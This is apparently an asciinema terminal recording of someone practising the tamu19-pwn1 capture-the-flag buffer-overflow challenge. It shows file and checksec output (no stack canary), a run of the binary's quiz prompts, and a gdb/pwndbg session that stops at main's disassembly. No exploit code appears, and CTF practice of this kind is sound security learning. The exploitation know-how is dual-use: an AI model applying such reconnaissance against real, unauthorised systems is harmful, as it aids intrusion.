{"version": 2, "width": 139, "height": 37, "timestamp": 1757526859, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.100122, "o", "                                                                                                                                           \r\r\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007"]
[0.12988, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[3.847208, "o", "f"]
[3.853263, "o", "\b\u001b[4mf\u001b[24m"]
[3.85354, "o", "\b\u001b[4mf\u001b[24m\u001b[38;2;153;153;153mile pwn1\u001b[39m\u001b[8D"]
[3.954684, "o", "\b\u001b[4mf\u001b[39m\u001b[4mi\u001b[24m"]
[4.121295, "o", "\b\b\u001b[4mf\u001b[4mi\u001b[39m\u001b[4ml\u001b[24m"]
[4.252544, "o", "\b\u001b[4ml\u001b[39m\u001b[4me\u001b[24m"]
[4.255103, "o", "\b\b\b\b\u001b[24m\u001b[36mf\u001b[24m\u001b[36mi\u001b[24m\u001b[36ml\u001b[24m\u001b[36me\u001b[39m"]
[4.344989, "o", "\b\u001b[36me\u001b[36m \u001b[39m"]
[4.347424, "o", "\b\b\u001b[36me\u001b[39m\u001b[39m "]
[4.526785, "o", "\u001b[39mp"]
[4.530204, "o", "\b\u001b[1mp\u001b[0m"]
[4.734996, "o", "\b\u001b[1mp\u001b[39m\u001b[1mn\u001b[0m\u001b[39m \u001b[39m \b\b"]
[4.738988, "o", "\b\b\u001b[0mp\u001b[0mn"]
[5.439849, "o", "\b \b"]
[5.443836, "o", "\b\u001b[1mp\u001b[0m\u001b[38;2;153;153;153mwn1\u001b[39m\b\b\b"]
[5.550994, "o", "\b\u001b[1mp\u001b[39m\u001b[1mw\u001b[0m"]
[5.780531, "o", "\b\u001b[1mw\u001b[39m\u001b[1mn\u001b[0m"]
[7.21708, "o", "\b\b\b\u001b[0mp\u001b[0mw\u001b[0mn\u001b[39m1"]
[7.220756, "o", "\b\b\b\b\u001b[1mp\u001b[1mw\u001b[1mn\u001b[1m1\u001b[0m"]
[8.462427, "o", "\b\u001b[1m1\u001b[1m.\u001b[0m"]
[9.065739, "o", "\b\b\u001b[1m1\u001b[0m\u001b[0m \b"]
[9.263486, "o", "\b\b\b\b\u001b[0mp\u001b[0mw\u001b[0mn\u001b[0m1"]
[9.263588, "o", "\r\r\nCompleting file\r\n\u001b[J\u001b[01;32mpwn1\u001b[0m*      \u001b[Jpwn1.cast  \u001b[Jpwn1.py  \u001b[J\u001b[A\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[0m\u001b[39m\r\u001b[4C\u001b[36mfile\u001b[39m pwn1\u001b[K\u001b[0m\u001b[39m"]
[9.264034, "o", "\u0007"]
[9.264909, "o", "\b\b\b\b\u001b[1mp\u001b[1mw\u001b[1mn\u001b[1m1\u001b[0m"]
[10.419998, "o", "\u001b[?1l\u001b>"]
[10.42009, "o", "\u001b[?2004l"]
[10.423404, "o", "\r\r\n\u001b[J"]
[10.427794, "o", "pwn1: ELF 32-bit LSB pie executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped\r\n"]
[10.428468, "o", "                                                                                                                                           \r\r"]
[10.428564, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007\r\n"]
[10.451469, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[14.033874, "o", "p"]
[14.040473, "o", "\b\u001b[1mp\u001b[0m"]
[14.041038, "o", "\b\u001b[1mp\u001b[0m\u001b[38;2;153;153;153ms\u001b[39m\b"]
[14.120552, "o", "\b\u001b[1mp\u001b[39m\u001b[1mw\u001b[0m"]
[14.126195, "o", "\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m checksec pwn1\u001b[39m\u001b[15D"]
[14.224936, "o", "\b\b\u001b[1mp\u001b[1mw\u001b[39m\u001b[1mn\u001b[0m\u001b[38;2;153;153;153m \u001b[39m\b"]
[14.227427, "o", "\b\b\b\u001b[0m\u001b[36mp\u001b[0m\u001b[36mw\u001b[0m\u001b[36mn\u001b[39m"]
[14.416321, "o", "\b\u001b[36mn\u001b[36m \u001b[39m"]
[14.419491, "o", "\b\b\u001b[36mn\u001b[39m\u001b[39m "]
[14.557528, "o", "\u001b[39mc"]
[15.306383, "o", "\u001b[12C"]
[15.311025, "o", "\b\b\b\b\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153mw\u001b[1m\u001b[38;2;153;153;153mn\u001b[1m\u001b[38;2;153;153;153m1\u001b[0m\u001b[39m"]
[15.647816, "o", "\u001b[?1l\u001b>"]
[15.648207, "o", "\u001b[?2004l"]
[15.651589, "o", "\r\r\n"]
[16.087685, "o", "[\u001b[1m\u001b[34m*\u001b[m] '/home/himanshu/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1/pwn1'\r\n    Arch:       i386-32-little\r\n    RELRO:      \u001b[32mFull RELRO\u001b[m\r\n    Stack:      \u001b[31mNo canary found\u001b[m\r\n    NX:         \u001b[32mNX enabled\u001b[m\r\n    PIE:        \u001b[32mPIE enabled\u001b[m\r\n    Stripped:   \u001b[31mNo\u001b[m\r\n"]
[16.224337, "o", "                                                                                                                                           \r\r\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007\r\n"]
[16.248212, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[16.248301, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[19.903286, "o", "g"]
[19.909164, "o", "\b\u001b[4mg\u001b[24m"]
[19.909528, "o", "\b\u001b[4mg\u001b[24m\u001b[38;2;153;153;153mdb ./pwn1\u001b[39m\u001b[9D"]
[20.006968, "o", "\b\u001b[4mg\u001b[39m\u001b[4md\u001b[24m"]
[20.129437, "o", "\b\b\u001b[4mg\u001b[4md\u001b[39m\u001b[4mb\u001b[24m"]
[20.132453, "o", "\b\b\b\u001b[24m\u001b[36mg\u001b[24m\u001b[36md\u001b[24m\u001b[36mb\u001b[39m"]
[20.294994, "o", "\b\u001b[36mb\u001b[36m \u001b[39m"]
[20.297497, "o", "\b\b\u001b[36mb\u001b[39m\u001b[39m "]
[20.864954, "o", "\u001b[39m."]
[20.868471, "o", "\b\u001b[1m.\u001b[0m"]
[20.965707, "o", "\b\u001b[1m.\u001b[39m\u001b[1m/\u001b[0m"]
[21.252897, "o", "\b\u001b[1m/\u001b[39m\u001b[1mp\u001b[0m"]
[21.450538, "o", "\b\u001b[1mp\u001b[39m\u001b[1mn\u001b[0m\u001b[39m \u001b[39m \b\b"]
[21.454505, "o", "\b\b\b\b\u001b[0m.\u001b[0m/\u001b[0mp\u001b[0mn"]
[22.146631, "o", "\b \b"]
[22.150903, "o", "\b\b\b\u001b[1m.\u001b[1m/\u001b[1mp\u001b[0m"]
[22.151123, "o", "\u001b[38;2;153;153;153mwn1\u001b[39m\b\b\b"]
[22.667309, "o", "\b\u001b[1mp\u001b[39m\u001b[1mw\u001b[0m"]
[22.810477, "o", "\b\u001b[1mw\u001b[39m\u001b[1mn\u001b[0m"]
[23.258107, "o", "\b\b\u001b[1mw\u001b[0m\u001b[0m \u001b[39m \b\b"]
[23.262354, "o", "\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b"]
[23.758414, "o", "\b\b\u001b[1mp\u001b[0m\u001b[0m \u001b[39m \u001b[39m \b\b\b"]
[23.762339, "o", "\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b"]
[23.789431, "o", "\b\b\u001b[1m/\u001b[0m\u001b[0m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b"]
[23.793915, "o", "\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b\b"]
[23.819533, "o", "\b\b\u001b[1m.\u001b[0m\u001b[0m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b"]
[23.82368, "o", "\u001b[38;2;153;153;153m/\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b\b\b"]
[23.850005, "o", "\b\u001b[0m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[23.853505, "o", "\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m/\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b\b\b\b"]
[23.880377, "o", "\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b\b"]
[23.884048, "o", "\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m/\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b\b\b\b\b"]
[23.910409, "o", "\b\b\b\u001b[36mg\u001b[36md\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[8D"]
[23.913522, "o", "\b\b\u001b[39m\u001b[4mg\u001b[39m\u001b[4md\u001b[24m"]
[23.913837, "o", "\u001b[38;2;153;153;153mb\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m/\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\u001b[8D"]
[23.942179, "o", "\b\b\u001b[4mg\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[9D"]
[23.945848, "o", "\b\u001b[4mg\u001b[24m\u001b[38;2;153;153;153md\u001b[39m\u001b[38;2;153;153;153mb\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m/\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\u001b[9D"]
[23.971266, "o", "\b\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[10D"]
[24.350287, "o", "."]
[24.353584, "o", "\b\u001b[36m.\u001b[39m"]
[24.353837, "o", "\b\u001b[36m.\u001b[39m\u001b[38;2;153;153;153m/\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b\b\b"]
[24.984142, "o", "\b\u001b[36m.\u001b[36m/\u001b[39m"]
[24.989047, "o", "\b\b\u001b[4m\u001b[32m.\u001b[4m\u001b[32m/\u001b[24m\u001b[39m"]
[25.410264, "o", "\b\b\u001b[4m\u001b[32m.\u001b[4m\u001b[32m/\u001b[4m\u001b[32mn\u001b[24m\u001b[39m\u001b[39m \u001b[39m \u001b[39m \b\b\b"]
[25.41601, "o", "\b\b\b\u001b[39m\u001b[4m.\u001b[39m\u001b[4m/\u001b[39m\u001b[4mn\u001b[24m"]
[25.416367, "o", "\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mm\u001b[39m\u001b[38;2;153;153;153mr\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153md\u001b[39m\b\b\b\b\b"]
[25.948454, "o", "\b\b\b\u001b[4m.\u001b[4m/\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[25.951548, "o", "\b\b\u001b[4m\u001b[32m.\u001b[4m\u001b[32m/\u001b[24m\u001b[39m"]
[25.951931, "o", "\u001b[38;2;153;153;153mp\u001b[39m\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b\b"]
[26.194392, "o", "\b\b\u001b[4m\u001b[32m.\u001b[4m\u001b[32m/\u001b[4m\u001b[32mp\u001b[24m\u001b[39m"]
[26.200454, "o", "\b\b\b\u001b[24m\u001b[39m\u001b[1m.\u001b[24m\u001b[39m\u001b[1m/\u001b[24m\u001b[39m\u001b[1mp\u001b[0m"]
[26.387611, "o", "\b\u001b[1mp\u001b[39m\u001b[1mn\u001b[0m\u001b[39m \u001b[39m \b\b"]
[26.39364, "o", "\b\b\b\b\u001b[0m\u001b[4m.\u001b[0m\u001b[4m/\u001b[0m\u001b[4mp\u001b[0m\u001b[4mn\u001b[24m"]
[26.558882, "o", "\b\u001b[4mn\u001b[4mw\u001b[24m"]
[27.178723, "o", "\b\b\u001b[4mn\u001b[24m\u001b[24m \b"]
[27.354607, "o", "\b\b\u001b[4mp\u001b[24m\u001b[24m \b"]
[27.357955, "o", "\b\b\b\u001b[24m\u001b[1m.\u001b[24m\u001b[1m/\u001b[24m\u001b[1mp\u001b[0m"]
[27.358266, "o", "\u001b[38;2;153;153;153mw\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\b\b\b"]
[27.524623, "o", "\b\u001b[1mp\u001b[39m\u001b[1mw\u001b[0m"]
[27.660888, "o", "\b\u001b[1mw\u001b[39m\u001b[1mn\u001b[0m"]
[28.101842, "o", "\b\b\b\b\b\u001b[0m\u001b[36m.\u001b[0m\u001b[36m/\u001b[0m\u001b[36mp\u001b[0m\u001b[36mw\u001b[0m\u001b[36mn\u001b[36m1\u001b[39m\u001b[1m \u001b[0m"]
[28.557711, "o", "\b\u001b[0m \b"]
[28.561167, "o", "\u001b[?1l\u001b>"]
[28.561387, "o", "\u001b[?2004l"]
[28.563883, "o", "\r\r\n"]
[28.568316, "o", "Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.\r\nWhat... is your name?\r\n"]
[43.953594, "o", "Sir Lancelot of Camelo"]
[44.32421, "o", "t"]
[44.639671, "o", "\r\nWhat... is your quest?\r\n"]
[50.716928, "o", "To seek the Holy Grail."]
[51.052883, "o", "\r\n"]
[51.053004, "o", "What... is my secret?\r\n"]
[52.410818, "o", "t"]
[52.605936, "o", "b"]
[52.798981, "o", "h"]
[52.984222, "o", " "]
[53.509275, "o", "i"]
[53.69573, "o", "d"]
[55.252297, "o", "k"]
[55.443484, "o", " "]
[56.411974, "o", ":"]
[56.811776, "o", ")"]
[57.596782, "o", "\r\n"]
[57.596897, "o", "I don't know that! Auuuuuuuugh!\r\n"]
[57.597432, "o", "                                                                                                                                           \r\r"]
[57.597562, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007\r\n"]
[57.621345, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[57.621517, "o", "\u001b[?2004h"]
[59.620881, "o", "g"]
[59.626007, "o", "\b\u001b[4mg\u001b[24m"]
[59.626352, "o", "\b\u001b[4mg\u001b[24m\u001b[38;2;153;153;153mdb ./pwn1\u001b[39m\u001b[9D"]
[59.75616, "o", "\b\u001b[4mg\u001b[39m\u001b[4md\u001b[24m"]
[59.87132, "o", "\b\b\u001b[4mg\u001b[4md\u001b[39m\u001b[4mb\u001b[24m"]
[59.874405, "o", "\b\b\b\u001b[24m\u001b[36mg\u001b[24m\u001b[36md\u001b[24m\u001b[36mb\u001b[39m"]
[60.43717, "o", "\b\u001b[36mb\u001b[36m \u001b[39m"]
[60.439772, "o", "\b\b\u001b[36mb\u001b[39m\u001b[39m "]
[60.840481, "o", "\u001b[39m."]
[60.843847, "o", "\b\u001b[1m.\u001b[0m"]
[60.995646, "o", "\b\u001b[1m.\u001b[39m\u001b[1m/\u001b[0m"]
[61.376681, "o", "\u001b[4C"]
[61.380269, "o", "\b\b\b\b\b\u001b[1m/\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153mw\u001b[1m\u001b[38;2;153;153;153mn\u001b[1m\u001b[38;2;153;153;153m1\u001b[0m\u001b[39m"]
[61.980584, "o", "\u001b[?1l\u001b>"]
[61.980711, "o", "\u001b[?2004l"]
[61.98381, "o", "\r\r\n"]
[62.120824, "o", "\u001b[35;1mGNU gdb (Debian 16.3-1) 16.3\u001b[m\r\nCopyright (C) 2024 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later <\u001b[32mhttp://gnu.org/licenses/gpl.html\u001b[m>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law.\r\nType \"\u001b[1mshow copying\u001b[m\" and \"\u001b[1mshow warranty\u001b[m\" for details.\r\nThis GDB was configured as \"x86_64-linux-gnu\".\r\nType \"\u001b[1mshow configuration\u001b[m\" for configuration details.\r\nFor bug reporting instructions, please see:\r\n\u001b[32m<https://www.gnu.org/software/gdb/bugs/>\u001b[m.\r\nFind the GDB manual and other documentation resources online at:\r\n    <\u001b[32mhttp://www.gnu.org/software/gdb/documentation/\u001b[m>.\r\n\r\nFor help, type \"\u001b[1mhelp\u001b[m\".\r\nType \"\u001b[1mapropos word\u001b[m\" to search for commands related to \"word\"...\r\n"]
[63.081344, "o", "\u001b[31m\u001b[1mpwndbg: \u001b[0m\u001b[31m\u001b[0m\u001b[91mloaded 209 pwndbg commands. Type \u001b[35mpwndbg [filter]\u001b[0m\u001b[91m for a list.\u001b[0m\r\n\u001b[31m\u001b[1mpwndbg: \u001b[0m\u001b[31m\u001b[0m\u001b[91mcreated 13 GDB functions (can be used with print/break). Type \u001b[35mhelp function\u001b[0m\u001b[91m to see them.\u001b[0m\r\n"]
[63.082211, "o", "Reading symbols from \u001b[32m./pwn1\u001b[m...\r\n"]
[63.082668, "o", "(No debugging symbols found in \u001b[32m./pwn1\u001b[m)\r\n"]
[63.08526, "o", "\u001b[31m\u001b[1m------- tip of the day\u001b[0m\u001b[31m\u001b[0m\u001b[91m (disable with \u001b[35mset show-tips off\u001b[0m\u001b[91m)\u001b[0m\u001b[31m\u001b[1m -------\u001b[0m\u001b[31m\u001b[0m\r\nUse the \u001b[33merrno\u001b[0m (or \u001b[33merrno <number>\u001b[0m) command to see the name of the last or provided (libc) error\r\n"]
[63.085487, "o", "\u001b[?2004h\u001b[31m\u001b[1mpwndbg> \u001b[0m\u001b[31m\u001b[0m"]
[63.88415, "o", "b"]
[64.06232, "o", " "]
[64.353958, "o", "m"]
[64.505821, "o", "a"]
[64.537272, "o", "i"]
[64.640645, "o", "n"]
[65.315978, "o", "\r\n\u001b[?2004l\r"]
[65.316556, "o", "Breakpoint 1 at \u001b[34m0x788\u001b[m\r\n"]
[65.3168, "o", "\u001b[?2004h\u001b[31m\u001b[1mpwndbg> \u001b[0m\u001b[31m\u001b[0m"]
[67.706433, "o", "r"]
[67.806096, "o", "\r\n\u001b[?2004l\r"]
[67.80645, "o", "Starting program: \u001b[32m/home/himanshu/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1/pwn1\u001b[m \r\n"]
[67.848578, "o", "[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"\u001b[32m/lib/x86_64-linux-gnu/libthread_db.so.1\u001b[m\".\r\n"]
[67.852837, "o", "\r\nBreakpoint 1, \u001b[34m0x56555788\u001b[m in \u001b[33mmain\u001b[m ()\r\n"]
[67.855197, "o", "\u001b[?2004h"]
[67.890663, "o", "LEGEND: \u001b[33mSTACK\u001b[0m | \u001b[34mHEAP\u001b[0m | \u001b[31mCODE\u001b[0m | \u001b[35mDATA\u001b[0m | \u001b[4m\u001b[31mWX\u001b[0m\u001b[4m\u001b[0m | \u001b[0mRODATA\u001b[0m\r\n\u001b[34m──────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────\u001b[0m\r\n \u001b[1mEAX \u001b[0m \u001b[31m0x56555779 (main)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mlea\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mecx\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m+\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m4\u001b[39m\u001b[38;5;15m]\u001b[39m\r\n \u001b[1mEBX \u001b[0m \u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n \u001b[1mECX \u001b[0m \u001b[33m0xffffcdb0\u001b[0m\u001b[0m ◂— \u001b[0m1\r\n \u001b[1mEDX \u001b[0m \u001b[33m0xffffcdd0\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n \u001b[1mEDI \u001b[0m \u001b[0m0xf7ffcb60 (_rtld_global_ro)\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mESI \u001b[0m \u001b[31m0x565558f0 (__libc_csu_init)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n \u001b[1mEBP \u001b[0m \u001b[33m0xffffcd98\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mESP \u001b[0m \u001b[33m0xffffcd90\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcdb0\u001b[0m\u001b[0m ◂— \u001b[0m1\r\n \u001b[1mEIP \u001b[0m \u001b[31m0x56555788 (main+15)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148msub\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x40\u001b[39m\r\n\u001b[34m────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────\u001b[0m\r\n ► \u001b[1m\u001b[32m0x56555788\u001b[0m\u001b[1m\u001b[0m \u001b[1m\u001b[32m<main+15> \u001b[0m\u001b[1m\u001b[0m   \u001b[1m\u001b[32m\u001b[38;5;148msub\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x40\u001b[39m\u001b[0m\u001b[1m\u001b[0m     \u001b[31m\u001b[1mESP\u001b[0m\u001b[31m\u001b[0m => \u001b[33m0xffffcd50\u001b[0m (0xffffcd90 - 0x40)\r\n   \u001b[0m0x5655578b\u001b[0m \u001b[0m<main+18> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31m__x86.get_pc_thunk.bx\u001b[0m\u001b[39m       <\u001b[31m__x86.get_pc_thunk.bx\u001b[0m>\r\n \r\n   \u001b[0m0x56555790\u001b[0m \u001b[0m<main+23> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mebx\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x1820\u001b[39m\r\n   \u001b[0m0x56555796\u001b[0m \u001b[0m<main+29> \u001b[0m   \u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mdword\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mptr\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;81mebx\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m+\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x44\u001b[39m\u001b[38;5;15m]\u001b[39m\r\n   \u001b[0m0x5655579c\u001b[0m \u001b[0m<main+35> \u001b[0m   \u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mdword\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mptr\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m]\u001b[39m\r\n   \u001b[0m0x5655579e\u001b[0m \u001b[0m<main+37> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0\u001b[39m\r\n   \u001b[0m0x565557a0\u001b[0m \u001b[0m<main+39> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0\u001b[39m\r\n   \u001b[0m0x565557a2\u001b[0m \u001b[0m<main+41> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m2\u001b[39m\r\n   \u001b[0m0x565557a4\u001b[0m \u001b[0m<main+43> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;81meax\u001b[39m\r\n   \u001b[0m0x565557a5\u001b[0m \u001b[0m<main+44> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31msetvbuf@plt\u001b[0m\u001b[39m                 <\u001b[31msetvbuf@plt\u001b[0m>\r\n \r\n   \u001b[0m0x565557aa\u001b[0m \u001b[0m<main+49> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x10\u001b[39m\r\n\u001b[34m─────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[0m00\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0000\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1mesp\u001b[0m \u001b[33m0xffffcd90\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcdb0\u001b[0m\u001b[0m ◂— \u001b[0m1\r\n"]
